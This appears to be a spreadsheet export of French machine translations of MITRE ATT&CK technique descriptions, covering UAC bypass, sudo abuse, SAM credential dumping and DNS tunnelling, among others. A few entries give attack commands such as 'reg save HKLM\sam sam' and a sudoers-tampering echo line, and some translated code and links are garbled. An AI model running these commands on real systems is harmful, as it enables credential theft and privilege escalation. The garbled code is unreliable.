Les adversaires peuvent abuser des doubles extensions pour tenter de dissimuler des types de fichiers dangereux de charges utiles. Une utilisation très courante consiste à inciter un utilisateur à ouvrir ce qu’il pense être un type de fichier inoffensif mais qui est en fait du code exécutable. Ces fichiers se font souvent passer pour des pièces jointes à un e-mail et permettent à un adversaire d’obtenir [Accès initial](https://attack.mitre.org/tactics/TA0001) dans le système d’un utilisateur via [Pièce jointe pour hameçonnage criminel](https://attack.mitre.org/techniques/T1566/001) puis [Exécution par l’utilisateur](https://attack.mitre.org/techniques/T1204). Par exemple, une pièce jointe de fichier exécutable nommée &lt;code&gt;Evil.txt.exe&lt;/code&gt; peut &lt;code&gt;s’afficher comme Evil.txt&lt;/code&gt; pour un utilisateur. L’utilisateur peut alors le visualiser comme un fichier texte inoffensif et l’ouvrir, exécutant par inadvertance le logiciel malveillant caché. (Citation : SOCPrime DoubleExtension)
Les types de fichiers courants, tels que les fichiers texte (.txt, .doc, etc.) et les fichiers image (.jpg, .gif, etc.) sont généralement utilisés comme première extension à apparaître inoffensive. Les extensions exécutables généralement considérées comme dangereuses, telles que .exe, .lnk, .hta et .scr, apparaissent souvent comme la deuxième extension et le véritable type de fichier.
https://attack.mitre.org/techniques/T1036/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent contourner les mécanismes UAC pour élever les privilèges de processus sur le système. Le contrôle de compte d’utilisateur (UAC) Windows permet à un programme d’élever ses privilèges (suivis par des niveaux d’intégrité allant de faible à élevé) pour effectuer une tâche sous des autorisations de niveau administrateur, éventuellement en demandant à l’utilisateur de confirmer. L’impact pour l’utilisateur va du refus de l’opération dans le cadre d’une application stricte à l’autorisation de l’utilisateur d’effectuer l’action s’il fait partie du groupe d’administrateurs locaux et clique sur l’invite, ou à la possibilité de saisir un mot de passe administrateur pour terminer l’action.
Si le niveau de protection UAC d’un ordinateur n’est pas le niveau le plus élevé, certains programmes Windows peuvent élever les privilèges ou exécuter des objets élevés [Component Object Model](https://attack.mitre.org/techniques/T1559/001) sans demander à l’utilisateur via la boîte de notification UAC. (Citation : TechNet à l’intérieur de l’UAC)(Citation : MSDN COM Elevation) Par exemple, l’utilisation de [Rundll32](https://attack.mitre.org/techniques/T1218/011) pour charger une DLL spécialement conçue qui charge un objet [Component Object Model](https://attack.mitre.org/techniques/T1559/001) à élévation automatique et effectue une opération de fichier dans un répertoire protégé qui nécessiterait généralement un accès élevé. Un logiciel malveillant peut également être injecté dans un processus approuvé pour obtenir des privilèges élevés sans inviter l’utilisateur. (Citation : Davidson Windows)
De nombreuses méthodes ont été découvertes pour contourner l’UAC. La page Readme Github pour UACME contient une liste exhaustive de méthodes (Citation : Github UACMe) qui ont été découvertes et mises en œuvre, mais il se peut qu’il ne s’agisse pas d’une liste exhaustive de contournements. D’autres méthodes de contournement sont régulièrement découvertes et certaines utilisées dans la nature, telles que :
* &lt;code&gt;eventvwr.exe&lt;/code&gt; pouvez élever automatiquement et exécuter un binaire ou un script spécifié. (Citation : enigma0x3 Fileless UAC Bypass)(Citation : Fortinet Fareit)
Un autre contournement est possible grâce à certaines techniques de mouvement latéral si les informations d’identification d’un compte avec des privilèges d’administrateur sont connues, car l’UAC est un mécanisme de sécurité de système unique et le privilège ou l’intégrité d’un processus exécuté sur un système sera inconnu sur les systèmes distants et sera par défaut à haute intégrité. (Citation : Contournement SANS UAC)
https://attack.mitre.org/techniques/T1548/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les services de messagerie pour pomper des SMS, ce qui peut avoir un impact sur la disponibilité du système et/ou du service hébergé. (Citation : Twilio SMS Pumping) Le pompage de SMS est un type de fraude dans le domaine des télécommunications par lequel un auteur de menace obtient d’abord un ensemble de numéros de téléphone d’un fournisseur de services de télécommunications, puis exploite l’infrastructure de messagerie d’une victime pour envoyer de grandes quantités de messages SMS à des numéros de cet ensemble. En générant du trafic SMS vers son numéro de téléphone défini, un auteur de menace peut gagner des paiements de la part du fournisseur de télécommunications. (Citation : Fraude au pompage de SMS Twilio)
Les auteurs de menace utilisent souvent des formulaires Web accessibles au public, tels que des mots de passe à usage unique (OTP) ou des champs de vérification de compte, afin de générer du trafic SMS. Ces champs peuvent exploiter des services tels que Twilio, AWS SNS et Amazon Cognito en arrière-plan. (Citation : Twilio SMS Pumping)(Référence : AWS RE :Inforce Threat Detection 2024) En réponse à la grande quantité de demandes, les coûts des SMS peuvent augmenter et les canaux de communication peuvent être débordés. (Citation : Twilio SMS Pumping)
https://attack.mitre.org/techniques/T1496/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent vérifier la connectivité Internet sur les systèmes compromis. Cela peut être effectué lors de la découverte automatisée et peut être accompli de nombreuses façons, telles que l’utilisation de [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt; et de requêtes GET vers des sites Web.
Les adversaires peuvent utiliser les résultats et les réponses de ces demandes pour déterminer si le système est capable de communiquer avec leurs serveurs C2 avant de tenter de s’y connecter. Les résultats peuvent également être utilisés pour identifier les routes, les redirecteurs et les serveurs proxy.
https://attack.mitre.org/techniques/T1016/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent effectuer une mise en cache sudo et/ou utiliser le fichier sudoers pour élever les privilèges. Les adversaires peuvent le faire pour exécuter des commandes en tant qu’autres utilisateurs ou générer des processus avec des privilèges plus élevés.
Dans les systèmes Linux et MacOS, sudo (parfois appelé « superuser do ») permet aux utilisateurs d’exécuter des commandes à partir de terminaux disposant de privilèges élevés et de contrôler qui peut exécuter ces commandes sur le système. La commande &lt;code&gt;sudo&lt;/code&gt; « permet à un administrateur système de déléguer l’autorité pour donner à certains utilisateurs (ou groupes d’utilisateurs) la possibilité d’exécuter certaines (ou toutes) commandes en tant qu’utilisateur root ou un autre utilisateur tout en fournissant une piste d’audit des commandes et de leurs arguments. » (Citation : sudo man page 2018) Étant donné que sudo a été conçu pour l’administrateur système, il dispose de certaines fonctionnalités de configuration utiles telles qu’un &lt;code&gt;timestamp_timeout&lt;/code&gt;, qui est le temps en minutes entre les instances de &lt;code&gt;sudo&lt;/code&gt; avant qu’il ne vous demande à nouveau un mot de passe. En effet, &lt;code&gt;sudo&lt;/code&gt; a la capacité de mettre en cache les informations d’identification pendant un certain temps. Sudo crée (ou touche) un fichier dans &lt;code&gt;/var/db/sudo&lt;/code&gt; avec un horodatage de la dernière exécution de sudo pour déterminer ce délai d’expiration. De plus, il existe une variable &lt;code&gt;tty_tickets&lt;/code&gt; qui traite chaque nouvelle tty (session terminale) de manière isolée. Cela signifie, par exemple, que le délai d’expiration sudo d’un tty n’affectera pas un autre tty (vous devrez taper à nouveau le mot de passe).
Le fichier sudoers, &lt;code&gt;/etc/sudoers&lt;/code&gt;, décrit quels utilisateurs peuvent exécuter quelles commandes et à partir de quels terminaux. Cela décrit également les commandes que les utilisateurs peuvent exécuter en tant qu’autres utilisateurs ou groupes. Cela fournit le principe du moindre privilège, de sorte que les utilisateurs s’exécutent avec leurs autorisations les plus faibles possibles la plupart du temps et n’accèdent à d’autres utilisateurs ou autorisations que si nécessaire, généralement en demandant un mot de passe. Cependant, le fichier sudoers peut également spécifier quand ne pas demander aux utilisateurs des mots de passe avec une ligne comme &lt;code&gt;user1 ALL=(ALL) NOPASSWD : ALL.&lt;/code&gt; (Référence : OSX. Cependant, des privilèges élevés sont nécessaires pour modifier ce fichier.
Les adversaires peuvent également abuser des mauvaises configurations de ces mécanismes pour élever les privilèges sans avoir besoin du mot de passe de l’utilisateur. Par exemple, l’horodatage de &lt;code&gt;/var/db/sudo&lt;/code&gt; peut être surveillé pour voir s’il se situe dans la plage &lt;code&gt;timestamp_timeout&lt;/code&gt;. Si c’est le cas, les logiciels malveillants peuvent exécuter des commandes sudo sans avoir à fournir le mot de passe de l’utilisateur. De plus, si &lt;code&gt;tty_tickets&lt;/code&gt; est désactivé, les adversaires peuvent le faire à partir de n’importe quel tty pour cet utilisateur.
Dans la nature, les logiciels malveillants &lt;code&gt;ont désactivé tty_tickets&lt;/code&gt; pour faciliter potentiellement la création de scripts en émettant &lt;code&gt;echo 'Defaults !tty_tickets' &gt;&gt; /etc/sudoers&lt;/code&gt;. (Citation : cybereason osx proton) Pour que ce changement soit pris en compte, le logiciel malveillant a également publié &lt;code&gt;killall Terminal&lt;/code&gt;. À partir de macOS Sierra, le fichier sudoers &lt;code&gt;a tty_tickets&lt;/code&gt; activé par défaut.
https://attack.mitre.org/techniques/T1548/003</t>
  </si>
  <si>
    <t>Un adversaire peut compresser ou chiffrer les données collectées avant l’exfiltration à l’aide d’une méthode personnalisée. Les adversaires peuvent choisir d’utiliser des méthodes d’archivage personnalisées, telles que le chiffrement avec XOR ou les chiffrements de flux mis en œuvre sans références de bibliothèque ou d’utilitaire externes. Des implémentations personnalisées d’algorithmes de compression bien connus ont également été utilisées. (Citation : ESET Sednit Partie 2)
https://attack.mitre.org/techniques/T1560/003</t>
  </si>
  <si>
    <t>Un adversaire peut tenter de modifier l’infrastructure de service de calcul d’un compte cloud pour échapper aux défenses. Une modification de l’infrastructure du service de calcul peut inclure la création, la suppression ou la modification d’un ou plusieurs composants tels que des instances de calcul, des machines virtuelles et des instantanés.
Les autorisations obtenues lors de la modification des composants de l’infrastructure peuvent contourner les restrictions qui empêchent l’accès à l’infrastructure existante. La modification des composants de l’infrastructure peut également permettre à un adversaire d’échapper à la détection et de supprimer les preuves de leur présence. (Citation : Mandiant M-Trends 2020)
https://attack.mitre.org/techniques/T1578</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les périphériques réseau tiers qui peuvent être utilisés lors du ciblage. Les périphériques réseau, tels que les routeurs de petits bureaux/bureaux à domicile (SOHO), peuvent être compromis lorsque l’objectif ultime de l’adversaire n’est pas [l’accès initial](https://attack.mitre.org/tactics/TA0001) à cet environnement, mais plutôt d’exploiter ces périphériques pour prendre en charge un ciblage supplémentaire.
Une fois qu’un adversaire a pris le contrôle, les périphériques réseau compromis peuvent être utilisés pour lancer des opérations supplémentaires, telles que l’hébergement de charges utiles pour des campagnes de [phishing](https://attack.mitre.org/techniques/T1566) (c’est-à-dire [Link Target](https://attack.mitre.org/techniques/T1608/005)) ou l’activation de l’accès requis pour exécuter des opérations [Content Injection](https://attack.mitre.org/techniques/T1659). Les adversaires peuvent également être en mesure de collecter des informations d’identification réutilisables (c’est-à-dire [Comptes valides](https://attack.mitre.org/techniques/T1078)) à partir de périphériques réseau compromis.
Les adversaires ciblent souvent les appareils de périphérie connectés à Internet et les appliances réseau associées qui ne prennent pas en charge les défenses robustes basées sur l’hôte. (Citation : Mandiant Fortinet Zero Day)(Citation : Cyberguerre câblée de la Russie)
Les périphériques réseau compromis peuvent être utilisés pour prendre en charge les activités ultérieures de [Command and Control](https://attack.mitre.org/tactics/TA0011), telles que [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) via un réseau [Proxy](https://attack.mitre.org/techniques/T1090) et/ou [Botnet](https://attack.mitre.org/techniques/T1584/005). (Référence : Justice GRU 2024)
https://attack.mitre.org/techniques/T1584/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter des publicités en ligne qui peuvent être utilisées à mauvais escient pour distribuer des logiciels malveillants aux victimes. Les annonces peuvent être achetées pour planter et positionner favorablement des artefacts à des endroits spécifiques en ligne, par exemple en bonne place dans les résultats des moteurs de recherche. Ces publicités peuvent rendre plus difficile pour les utilisateurs de faire la distinction entre les résultats de recherche réels et les publicités. (Citation : spamhaus-malvertising) Les publicités achetées peuvent également cibler des publics spécifiques en utilisant les capacités du réseau publicitaire, ce qui permet de tirer parti de la confiance inhérente accordée aux moteurs de recherche et aux sites Web populaires. 
Les adversaires peuvent acheter des publicités et d’autres ressources pour aider à distribuer des artefacts contenant du code malveillant aux victimes. Les publicités achetées peuvent tenter d’usurper l’identité de marques connues ou de les usurper. Par exemple, ces publicités usurpées peuvent inciter les victimes à cliquer sur l’annonce, ce qui peut ensuite les envoyer vers un domaine malveillant qui peut être un clone de sites Web officiels contenant des versions trojanisées du logiciel annoncé. (Citation : Masquerads-Guardio)(Citation : FBI-search) Les efforts de l’adversaire pour créer des domaines malveillants et acheter des publicités peuvent également être automatisés à grande échelle afin de mieux résister aux efforts de nettoyage. (Citation : sentinelone-malvertising) 
Le malvertising peut être utilisé pour soutenir [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) et [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), nécessitant potentiellement une interaction limitée de la part de l’utilisateur si l’annonce contient du code/des exploits qui infectent le navigateur Web du système cible. (Citation : BBC-malvertising)
Les adversaires peuvent également employer plusieurs techniques pour échapper à la détection par le réseau publicitaire. Par exemple, les adversaires peuvent acheminer dynamiquement les clics sur les annonces pour envoyer le trafic automatisé des robots d’indexation/application des règles vers des sites inoffensifs, tout en validant les cibles potentielles, puis en envoyant les victimes renvoyées à partir de clics réels sur des annonces vers des pages malveillantes. Ce vecteur d’infection peut donc rester caché du réseau publicitaire ainsi que de tout visiteur qui n’accède pas aux sites malveillants avec un identifiant valide en cliquant sur la publicité. (Citation : Masquerads-Guardio) D’autres astuces, telles que des fautes de frappe intentionnelles pour éviter la surveillance de la réputation de la marque, peuvent également être utilisées pour échapper à la détection automatique. (Citation : spamhaus-malvertising)
https://attack.mitre.org/techniques/T1583/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de découvrir les paramètres de groupe et d’autorisation. Ces informations peuvent aider les adversaires à déterminer quels comptes d’utilisateurs et quels groupes sont disponibles, l’appartenance des utilisateurs à des groupes particuliers et quels utilisateurs et groupes disposent d’autorisations élevées.
Les adversaires peuvent tenter de découvrir les paramètres d’autorisation de groupe de différentes manières. Ces données peuvent fournir à l’adversaire des informations sur l’environnement compromis qui peuvent être utilisées dans le cadre d’activités de suivi et de ciblage. (Citation : CrowdStrike BloodHound avril 2018)
https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler l’adresse e-mail de l’utilisateur pour collecter des informations sensibles. Les e-mails peuvent contenir des données sensibles, notamment des secrets commerciaux ou des informations personnelles, qui peuvent s’avérer précieuses pour les adversaires. Les e-mails peuvent également contenir des détails sur les opérations de réponse aux incidents en cours, ce qui peut permettre aux adversaires d’ajuster leurs techniques afin de maintenir la persistance ou d’échapper aux défenses. (Citation : TrustedSec OOB Communications)(Référence : CISA AA20-352A 2021) Les adversaires peuvent collecter ou transférer des e-mails à partir de serveurs de messagerie ou de clients.
https://attack.mitre.org/techniques/T1114</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’extraire des informations d’identification de la base de données SAM (Security Account Manager) soit par des techniques en mémoire, soit par le biais du registre Windows où la base de données SAM est stockée. Le SAM est un fichier de base de données qui contient les comptes locaux de l’hôte, généralement ceux trouvés avec la commande &lt;code&gt;net user&lt;/code&gt;. L’énumération de la base de données SAM nécessite un accès au niveau SYSTEM.
Un certain nombre d’outils peuvent être utilisés pour récupérer le fichier SAM grâce à des techniques en mémoire :
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternativement, le SAM peut être extrait du registre avec Reg :
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\système système&lt;/code&gt;
Creddump7 peut ensuite être utilisé pour traiter la base de données SAM localement afin de récupérer les hachages. (Citation : GitHub Creddump7)
Notes: 
* Le compte RID 500 est l’administrateur local intégré.
* Le RID 501 est le compte invité.
* Les comptes d’utilisateurs commencent avec un RID de 1 000+.
https://attack.mitre.org/techniques/T1003/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans les données WHOIS publiques des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les données WHOIS sont stockées par les registres Internet régionaux (RIR) chargés de l’allocation et de l’attribution des ressources Internet telles que les noms de domaine. N’importe qui peut interroger les serveurs WHOIS pour obtenir des informations sur un domaine enregistré, telles que les blocs d’adresses IP attribués, les informations de contact et les serveurs de noms DNS. (Citation : WHOIS)
Les adversaires peuvent rechercher des données WHOIS pour recueillir des informations exploitables. Les acteurs de la menace peuvent utiliser des ressources en ligne ou des utilitaires de ligne de commande pour piller les données WHOIS à la recherche d’informations sur les victimes potentielles. Les informations provenant de ces sources peuvent révéler des opportunités pour d’autres formes de reconnaissance (ex : [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598)), l’établissement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https://attack.mitre.org/techniques/T1596/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le microprogramme du système pour qu’il persiste sur les systèmes. Le BIOS (Basic Input/Output System) et l’interface UEFI (Unified Extensible Firmware Interface) ou EFI (Extensible Firmware Interface) sont des exemples de microprogramme système qui fonctionnent comme l’interface logicielle entre le système d’exploitation et le matériel d’un ordinateur. (Citation : BIOS de Wikipédia)(Citation : Wikipédia UEFI)(Citation : À propos de l’UEFI)
Les microprogrammes système tels que le BIOS et l’EFI sont à la base des fonctionnalités d’un ordinateur et peuvent être modifiés par un adversaire pour effectuer ou participer à des activités malveillantes. Il est possible d’écraser le micrologiciel du système, ce qui peut donner à des adversaires sophistiqués un moyen d’installer des mises à jour de microprogramme malveillantes comme moyen de persistance sur un système qui peut être difficile à détecter.
https://attack.mitre.org/techniques/T1542/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des sites Web appartenant à la victime à la recherche d’informations qui peuvent être utilisées lors du ciblage. Les sites Web appartenant aux victimes peuvent contenir divers détails, notamment les noms des services ou des divisions, les emplacements physiques et des données sur les employés clés, comme les noms, les rôles et les coordonnées (p. ex. : [Adresses e-mail](https://attack.mitre.org/techniques/T1589/002)). Ces sites peuvent également contenir des détails mettant en évidence les opérations et les relations commerciales. (Citation : Fuite Comparitech)
Les adversaires peuvent effectuer des recherches sur des sites Web appartenant à des victimes pour recueillir des informations exploitables.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[Trusted Relation](https://attack.mitre.org/techniques/T1199) ou [Hameçonnage](https://attack.mitre.org/techniques/T1566)).
En plus de naviguer manuellement sur le site Web, les adversaires peuvent tenter d’identifier des répertoires ou des fichiers cachés qui pourraient contenir des informations sensibles supplémentaires ou des fonctionnalités vulnérables. Ils peuvent le faire par le biais d’activités automatisées telles que [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), ainsi qu’en exploitant des fichiers tels que sitemap.xml et robots.txt. (Citation : Perez sitemap XML 2023)(Citation : Registre des robots TXT 2015)
https://attack.mitre.org/techniques/T1594</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de trouver des groupes de cloud et des paramètres d’autorisation. La connaissance des groupes d’autorisations cloud peut aider les adversaires à déterminer les rôles particuliers des utilisateurs et des groupes au sein d’un environnement, ainsi que les utilisateurs associés à un groupe particulier.
Avec l’accès authentifié, il existe plusieurs outils qui peuvent être utilisés pour trouver des groupes d’autorisations. L’applet de commande &lt;code&gt;PowerShell Get-MsolRole&lt;/code&gt; peut être utilisée pour obtenir des rôles et des groupes d’autorisations pour les comptes Exchange et Office 365 (Référence : Microsoft Msolrole) (Référence : GitHub Raindance).
Azure CLI (AZ CLI) et l’API du fournisseur d’identité Google Cloud fournissent également des interfaces permettant d’obtenir des groupes d’autorisations. La commande &lt;code&gt;az ad user get-member-groups&lt;/code&gt; répertorie les groupes associés à un compte d’utilisateur pour Azure, tandis que le point de terminaison &lt;code&gt;d’API GET https://cloudidentity.googleapis.com/v1/groups&lt;/code&gt; répertorie les ressources de groupe disponibles pour un utilisateur pour Google. (Citation : Microsoft AZ CLI)(Citation : Black Hills Red Teaming MS AD Azure, 2018)(Citation : Documentation de l’API Google Cloud Identity) Dans AWS, les commandes « ListRolePolicies » et « ListAttachedRolePolicies » permettent aux utilisateurs d’énumérer les stratégies attachées à un rôle. (Citation : Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Les adversaires peuvent tenter de répertorier les listes de contrôle d’accès des objets afin de déterminer le propriétaire et d’autres comptes ayant accès à l’objet, par exemple, via l’API AWS &lt;code&gt;GetBucketAcl&lt;/code&gt; (citation : AWS Get Bucket ACL). À l’aide de ces informations, un adversaire peut cibler des comptes disposant d’autorisations sur un objet donné ou exploiter des comptes qu’il a déjà compromis pour accéder à l’objet.
https://attack.mitre.org/techniques/T1069/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les entrées de registre utilisées par les services. Les adversaires peuvent utiliser des failles dans les autorisations des clés de registre liées aux services pour rediriger de l’exécutable spécifié à l’origine vers un exécutable qu’ils contrôlent, afin de lancer leur propre code au démarrage d’un service. Windows stocke les informations de configuration du service local dans le registre sous &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Les informations stockées sous les clés de registre d’un service peuvent être manipulées pour modifier les paramètres d’exécution d’un service à l’aide d’outils tels que le contrôleur de service, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001) ou [Reg](https://attack.mitre.org/software/S0075). L’accès aux clés de registre est contrôlé par le biais de listes de contrôle d’accès et d’autorisations utilisateur. (Citation : Sécurité de la clé de registre)(Citation : malware_hides_service)
Si les autorisations pour les utilisateurs et les groupes ne sont pas correctement définies et ne permettent pas l’accès aux clés de registre d’un service, les adversaires peuvent modifier le binPath/ImagePath du service pour pointer vers un autre exécutable sous leur contrôle. Lorsque le service démarre ou est redémarré, le programme contrôlé par l’adversaire s’exécute, ce qui permet à l’adversaire d’établir la persistance et/ou l’élévation de privilèges vers le contexte de compte sous lequel le service est configuré pour s’exécuter (compte local/de domaine, SYSTEM, LocalService ou NetworkService).
Les adversaires peuvent également modifier d’autres clés de registre dans l’arborescence du registre du service. Par exemple, la touche &lt;code&gt;FailureCommand&lt;/code&gt; peut être modifiée afin que le service soit exécuté dans un contexte élevé chaque fois qu’il échoue ou qu’il est intentionnellement endommagé. (Citation : Collectionneurs liés au Kansa Service)(Citation : Faiblesse des permanentes du registre des tweets)
La clé &lt;code&gt;Performance&lt;/code&gt; contient le nom de la DLL de performance d’un service de pilote et les noms de plusieurs fonctions exportées dans la DLL. (Référence : microsoft_services_registry_tree) Si la clé &lt;code&gt;de performance&lt;/code&gt; n’est pas déjà présente et si un utilisateur contrôlé par l’adversaire dispose de l’autorisation &lt;code&gt;Créer une sous-clé&lt;/code&gt;, les adversaires peuvent créer la clé &lt;code&gt;de performance&lt;/code&gt; dans l’arborescence du registre du service pour pointer vers une DLL malveillante. (Référence : insecure_reg_perms)
Les adversaires peuvent également ajouter la clé &lt;code&gt;Parameters&lt;/code&gt;, qui stocke des données spécifiques au pilote, ou d’autres sous-clés personnalisées pour leurs services malveillants afin d’établir la persistance ou d’activer d’autres activités malveillantes. (Référence : microsoft_services_registry_tree)(Référence : troj_zegost) De plus, si des adversaires lancent leurs services malveillants à l’aide de svchost.exe, le fichier du service peut être identifié à l’aide &lt;code&gt;de HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll&lt;/code&gt;. (Citation : malware_hides_service)
https://attack.mitre.org/techniques/T1574/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans les données DNS des informations sur les victimes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adversaires peuvent rechercher des données DNS pour recueillir des informations exploitables. Les acteurs malveillants peuvent interroger directement les serveurs de noms d’une organisation cible ou effectuer des recherches dans des référentiels centralisés de réponses aux requêtes DNS enregistrées (appelées DNS passifs). (Citation : benne à ordures DNS)(Citation : Circl DNS passif) Les adversaires peuvent également rechercher et cibler les erreurs de configuration/fuites DNS qui révèlent des informations sur les réseaux internes. Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Rechercher des sites Web appartenant à la victime](https://attack.mitre.org/techniques/T1594) ou [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établir des ressources opérationnelles (ex : [Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou un accès initial (ex : [Externe à distance Services](https://attack.mitre.org/techniques/T1133) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler des fonctionnalités gourmandes en ressources des applications pour provoquer un déni de service (DoS), privant ainsi ces applications de leur disponibilité. Par exemple, des fonctionnalités spécifiques dans les applications Web peuvent être très gourmandes en ressources. Des requêtes répétées adressées à ces fonctionnalités peuvent épuiser les ressources système et refuser l’accès à l’application ou au serveur lui-même. (Citation : Arbor AnnualDoSreport janvier 2018)
https://attack.mitre.org/techniques/T1499/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent manipuler les dépendances logicielles et les outils de développement avant qu’ils ne soient reçus par un consommateur final dans le but de compromettre les données ou le système. Les applications dépendent souvent de logiciels externes pour fonctionner correctement. Les projets open source populaires qui sont utilisés comme dépendances dans de nombreuses applications peuvent être ciblés comme moyen d’ajouter du code malveillant aux utilisateurs de la dépendance. (Citation : Compromis NPM de Trendmicro)  
Le ciblage peut être spécifique à un ensemble de victimes souhaitées ou peut être distribué à un large éventail de consommateurs, mais ne passer qu’à des tactiques supplémentaires visant des victimes spécifiques.
https://attack.mitre.org/techniques/T1195/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter et/ou voler des certificats SSL/TLS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Les adversaires peuvent acheter ou voler des certificats SSL/TLS pour poursuivre leurs opérations, telles que le chiffrement du trafic C2 (ex : [Cryptographie asymétrique](https://attack.mitre.org/techniques/T1573/002) avec [Protocoles Web](https://attack.mitre.org/techniques/T1071/001)) ou même l’activation de [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) si le certificat est approuvé ou ajouté d’une autre manière à la racine de confiance (c’est-à-dire [Installer le certificat racine]( https://attack.mitre.org/techniques/T1553/004)). L’achat de certificats numériques peut être effectué à l’aide d’une organisation de façade ou à l’aide d’informations volées à une entité précédemment compromise qui permettent à l’adversaire de valider auprès d’un fournisseur de certificats en tant qu’entité telle qu’elle est dans le même temps. Les adversaires peuvent également voler des documents de certificat directement auprès d’un tiers compromis, y compris auprès des autorités de certification. (Citation : DiginotarCompromise) Les adversaires peuvent enregistrer ou détourner des domaines pour lesquels ils achèteront ultérieurement un certificat SSL/TLS.
Il existe des autorités de certification qui permettent aux adversaires d’acquérir gratuitement des certificats SSL/TLS, tels que des certificats de validation de domaine. (Citation : FAQ sur Let’s Encrypt)
Après avoir obtenu un certificat numérique, un adversaire peut ensuite installer ce certificat (voir [Installer un certificat numérique](https://attack.mitre.org/techniques/T1608/003)) sur l’infrastructure sous son contrôle.
https://attack.mitre.org/techniques/T1588/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent configurer leurs propres serveurs DNS (Domain Name System) qui peuvent être utilisés lors du ciblage. Au cours de l’activité post-compromission, les adversaires peuvent utiliser le trafic DNS pour diverses tâches, notamment pour la commande et le contrôle (ex : [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Au lieu de détourner les serveurs DNS existants, les adversaires peuvent choisir de configurer et d’exécuter leurs propres serveurs DNS pour soutenir les opérations.
En exécutant leurs propres serveurs DNS, les adversaires peuvent avoir plus de contrôle sur la façon dont ils administrent le trafic DNS C2 côté serveur ([DNS](https://attack.mitre.org/techniques/T1071/004)). En contrôlant un serveur DNS, les adversaires peuvent configurer des applications DNS pour fournir des réponses conditionnelles aux logiciels malveillants et, généralement, disposer d’une plus grande flexibilité dans la structure du canal C2 basé sur DNS. (Citation : Unit42 DNS mars 2019)
https://attack.mitre.org/techniques/T1583/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent effacer ou corrompre les données brutes du disque sur des systèmes spécifiques ou en grand nombre dans un réseau pour interrompre la disponibilité des ressources système et réseau. Avec un accès direct en écriture à un disque, les adversaires peuvent tenter d’écraser des parties des données du disque. Les adversaires peuvent choisir d’effacer des parties arbitraires des données du disque et/ou d’effacer les structures de disque comme l’enregistrement de démarrage principal (MBR). Une tentative d’effacement complet de tous les secteurs du disque peut être tentée.
Pour maximiser l’impact sur l’organisation cible dans les opérations où l’interruption de la disponibilité à l’échelle du réseau est l’objectif, les programmes malveillants utilisés pour effacer les disques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Sur les périphériques réseau, les adversaires peuvent effacer les fichiers de configuration et d’autres données du périphérique à l’aide de commandes telles que « effacer » (https://attack.mitre.org/techniques/T1059/008 de l’interface de ligne de commande [Network Device CLI](. (Référence : erase_cmd_cisco)
https://attack.mitre.org/techniques/T1561</t>
  </si>
  <si>
    <t>Les adversaires peuvent communiquer à l’aide du protocole de couche application DNS (Domain Name System) pour éviter la détection/le filtrage du réseau en se fondant dans le trafic existant. Les commandes adressées au système distant, et souvent les résultats de ces commandes, seront incorporés dans le trafic de protocole entre le client et le serveur. 
Le protocole DNS remplit une fonction administrative dans les réseaux informatiques et peut donc être très courant dans les environnements. Le trafic DNS peut également être autorisé avant même que l’authentification réseau ne soit terminée. Les paquets DNS contiennent de nombreux champs et en-têtes dans lesquels les données peuvent être dissimulées. Souvent connu sous le nom de tunneling DNS, les adversaires peuvent abuser du DNS pour communiquer avec les systèmes sous leur contrôle au sein d’un réseau victime tout en imitant le trafic normal et attendu. (Citation : Tunneling DNS PAN)(Citation : Medium DnsTunneling)
https://attack.mitre.org/techniques/T1071/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’accéder à l’API Cloud Instance Metadata pour collecter des informations d’identification et d’autres données sensibles.
